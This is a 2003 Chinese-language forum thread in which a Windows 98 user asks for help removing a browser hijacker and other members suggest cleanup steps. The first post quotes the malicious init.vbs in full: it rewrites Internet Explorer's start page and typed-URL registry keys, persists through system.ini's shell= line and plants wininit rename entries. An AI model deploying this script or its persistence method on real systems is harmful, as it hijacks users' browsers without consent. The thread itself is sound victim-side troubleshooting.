免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
论坛 IT运维 数据安全 这是什么东西?
最近访问板块 发新帖
查看: 3263 | 回复: 9
打印 上一主题 下一主题

这是什么东西? [复制链接]

弱智

论坛徽章:
1
荣誉会员 日期:2011-11-23 16:44:17
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2003-03-03 11:02 |只看该作者 |倒序浏览
事情是这样的:

机器配置:Windows98 第二版,IE6+sp1,
1、网友在QQ里发了个地址,不好意思,URL我忘了。在IE6的地址栏里键入之后,看到一手机短信“激情交友”的页面。我想,坏了,说不定改了什么了。

2、查看IE6的Internet选项,发现默认页面已被改成 "mysms.163y.com",重启电脑,无法改回默认页面。运行msconfig,在“启动”中,增加了:“C:\WINDOWS\explorer.hta ”
运行msconfig,在system.ini中“boot”中,shell=Explorer.exe 被改成
shell=Explorer.exe C:\WINDOWS\Init.vbs
   
3、运行regedit, 发现一些新增加的键和键值(lxb2003.sms.163.com)。

4、检查发现,多了这个文件:c:\windows\init.vbs,   内容:

Set FSO = WScript.CreateObject("Scripting.FileSystemObject"
FSO.CopyFile "C:\WINDOWS\system.ini","C:\WINDOWS\system.tmp"
If FSO.FileExists("C:\WINDOWS\wininit.bak" Then FSO.CopyFile"C:\WINDOWS\wininit.bak","C:\WINDOWS\wininit.ini"
Set Shell = WScript.CreateObject("WScript.Shell"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs\url1","http://lxb2003.honey.163.com"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs\url2","http://lxb2003.honey.163.com"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs\url3","http://lxb2003.honey.163.com"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs\url4","http://lxb2003.honey.163.com"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs\url5","http://lxb2003.honey.163.com"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs\url6","http://lxb2003.honey.163.com"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs\url7","http://lxb2003.honey.163.com"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs\url8","http://lxb2003.honey.163.com"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs\url9","http://lxb2003.honey.163.com"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs\url10","http://lxb2003.honey.163.com"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs\url11","http://lxb2003.honey.163.com"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs\url12","http://lxb2003.honey.163.com"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs\url13","http://lxb2003.honey.163.com"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs\url14","http://lxb2003.honey.163.com"
Shell.RegWrite "HKEY_CURRENT_USER\SoftWare\Microsoft\Internet Explorer\Main\Start Page","http://mysms.163y.com"
Shell.RegWrite "HKEY_CURRENT_USER\SoftWare\Microsoft\Internet Explorer\Main\First Home Page","http://lxb2003.sms.163.com"






被更改了这个文件:c:\windows\wininit.bak,   内容:
[rename]
C:\WINDOWS\system.old=C:\WINDOWS\system.ini
C:\WINDOWS\system.ini=C:\WINDOWS\system.tmp
[rename]
C:\WINDOWS\system.old=C:\WINDOWS\system.ini
C:\WINDOWS\system.ini=C:\WINDOWS\system.tmp
NUL=C:\WINDOWS\TEMP\GLB1A2B.EXE
NUL=C:\WINDOWS\TEMP\GLB1A2B.EXE
NUL=C:\WINDOWS\TEMP\_iu14D2N.tmp
   


5、于是,手动清除。
c:\windows>;del .\init.vbs
c:\windows>;del .\temp\.
c:\windows>;del .\*.hta
c:\windows>;del .\wininit.bak
c:\windows>;copy .\wininit.sav .\wininit.bak
接着,改回在注册表中的键值。



问题是:
在c:\windows\wininit.bak中“NUL=C:\WINDOWS\TEMP\GLB1A2B.EXE”是什么东西?
还有,我的这样清除方法可行么?是否还有什么没有清除干净?
谢谢!
    
adrianke

论坛徽章:
0
2 [报告]
发表于 2003-03-03 11:14 |只看该作者

这是什么东西?

你不如用个魔法兔子,还不用手动清除
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
弱智

论坛徽章:
1
荣誉会员 日期:2011-11-23 16:44:17
3 [报告]
发表于 2003-03-03 11:20 |只看该作者

这是什么东西?

呵呵,不是没有装魔法兔子么~~
再说,自己动手心里面明白怎么回事。
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
无花果

论坛徽章:
0
4 [报告]
发表于 2003-03-03 18:45 |只看该作者

这是什么东西?

管他是什么, 不正常的, 删!!!
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
づ★sl战神

论坛徽章:
0
5 [报告]
发表于 2003-03-04 10:31 |只看该作者

这是什么东西?

我不同意楼上的这位观点`!

对于你的那个问题
我倒是觉得你基本上搞定了~!
呵呵`!
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
花背鼠

论坛徽章:
0
6 [报告]
发表于 2003-03-04 11:34 |只看该作者

这是什么东西?

TEMP下的尽管删除,肯定有鬼
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
adrianke

论坛徽章:
0
7 [报告]
发表于 2003-03-04 11:48 |只看该作者

这是什么东西?

同意楼上的,我的*.tmp文件全部删光
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
fanfan

论坛徽章:
0
8 [报告]
发表于 2003-03-04 11:50 |只看该作者

这是什么东西?

我以前也碰到过,比那个还厉害的,一打开一个网页,立即弹出无数个窗口,魔法兔子也不好使,只好重装ie
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
depike

论坛徽章:
0
9 [报告]
发表于 2003-03-04 12:10 |只看该作者

这是什么东西?

我觉得仅这样删除还是不够的,Happytime病毒大家应该听说过,它感染的原理类似于楼主所说的情况,发作现象类似于楼上所说的,开窗口,其实这个时候,系统中所有的.htm文件均被感染了,在每一个htm文件末尾都添加了一段恶意代码,所以请楼主还是好好一下htm文件是否正常,最好用norton杀一下比较好,另外norton对于script攻击防御的也是比较好的。
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
弱智

论坛徽章:
1
荣誉会员 日期:2011-11-23 16:44:17
10 [报告]
发表于 2003-03-04 19:55 |只看该作者

这是什么东西?

谢谢各位大哥!
让小弟试试看。
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP